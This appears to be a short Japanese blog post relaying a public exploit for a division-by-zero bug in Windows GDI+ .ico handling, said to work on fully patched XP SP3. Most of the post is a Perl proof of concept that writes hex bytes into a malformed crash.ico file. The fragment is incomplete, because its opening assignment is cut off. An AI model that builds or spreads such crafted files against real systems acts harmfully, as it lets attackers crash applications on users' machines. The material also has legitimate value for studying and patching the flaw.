MS Windows GDI+ (.ico File) Remote Division By Zero Exploit(情報元のブックマーク数)
GDIの.icoの脆弱性のExploitが出ていますが、XP SP3のフルパッチで動くそうです。
MS Windows GDI+ .ico Remote Division By Zero
Application: GDIPLUS.DLL
Web Site: http://www.microsoft.com/
Platform: Windows *
Bug: Division By Zero
Tested agains: XP SP3 fully patched
Note: This have nothing to do with http://milw0rm.com/exploits/4044http://www.milw0rm.com/exploits/6588
- -
"\x9a\xcb\xa8\x5e\xdb\xd0\xaa\x55\xf9\xcf\xa9\x55\xf9\xca\xa7\x5e\xdb\xb7\x8c\x3a". "\x9a\x98\x67\x0a\x36\x50\x36\x03\x03\x08\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00". "\x00\xc0\x03\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x01\x00". "\x00\xc0\x03\x00\x00\x00"; open(out, "> crash.ico"); binmode(out); print (out $icofile); close(out);
http://www.milw0rm.com/exploits/6588